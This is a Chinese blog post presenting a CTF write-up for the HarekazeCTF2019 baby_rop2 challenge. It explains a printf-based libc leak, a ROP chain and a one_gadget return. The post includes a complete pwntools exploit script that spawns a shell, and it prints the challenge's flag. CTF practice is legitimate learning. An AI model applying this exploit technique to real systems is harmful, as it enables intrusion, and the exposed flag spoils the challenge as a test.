【CTF-PWN】ROP + One_gadget拿shell


记录一下在题目中one_gadget的使用, one_gadget永远滴神.

0x01 题目地址

https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2

0x02 开始梭哈

题目给了一个babyrop2和一个libc.so.6, 先分析一下这个babyrop2.

babyrop2

程序就一个输入点

打算使用printf函数泄露出__libc_start_main的地址. (确实没有找到合适泄露的函数, 只能这个了…)

也就是要构造一个printf("%s", __libc_start_main的got地址)
先找到%s

截取到%s开始, 也就是

__libc_start_maingot就不用多说了.

接下来从libc.so.6里面得到一些信息

libc.so.6

我们要从这个文件中得到one_gadget, 需要借助一个工具, 就叫one_gadget.

one_gadget是什么呢? 就是我们以往做ROP需要泄露地址然后拿到真实的system函数以及bin_sh字符串的地址构造ROP, 但是当有了one_gadget, 就可以直接返回到这个地址拿到shell.

0x03 exp

from pwn import *

p = process("./babyrop2")
# p = remote("node3.buuoj.cn", 29305)
elf = ELF("./babyrop2")
libc = elf.libc

# var
overflow = 0x20 + 8
format_string = 0x400790
pop_rdi = 0x0000000000400733
pop_rsi_r15 = 0x0000000000400731
printf_plt = elf.plt["printf"]
libc_start_main_got = elf.got["__libc_start_main"]
main_addr = elf.sym["main"]

payload = "A" * overflow
payload += p64(pop_rdi) + p64(format_string)
payload += p64(pop_rsi_r15) + p64(libc_start_main_got) + p64(0)
payload += p64(printf_plt) + p64(main_addr)

p.sendline(payload)

leak_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8, "\0"))
success("libc_start_main: {}".format(hex(leak_addr)))

libc_base = leak_addr - libc.sym["__libc_start_main"]

payload = "A" * overflow
payload += p64(libc_base + 0x45216)

p.sendline(payload)

p.interactive()

emm, 这题目flag竟然没放到根目录, 还要找一下才可以QAQ

flag{23d424ad-f38b-4a47-a60f-41ca5c19fb88}


文章作者: HeliantHuS
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 HeliantHuS !
评论
 本篇
【CTF-PWN】ROP + One_gadget拿shell 【CTF-PWN】ROP + One_gadget拿shell
记录一下在题目中one_gadget的使用, one_gadget永远滴神. 0x01 题目地址https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 0x02 开始梭哈题目给了一个
2020-06-20
下一篇 
BUUOJ CTF Misc题目WriteUP BUUOJ CTF Misc题目WriteUP
BUUOJ CTF, 日常刷题记录, 包含题目flag, 以及使用的脚本. 这是关于杂项题目的WP, 之前写过密码学的WP, 如果有需要可以转到BUUCTF 密码学思路 签到emm, 直接给flag了。flag{buu_ctf} 金三
2020-06-02
  目录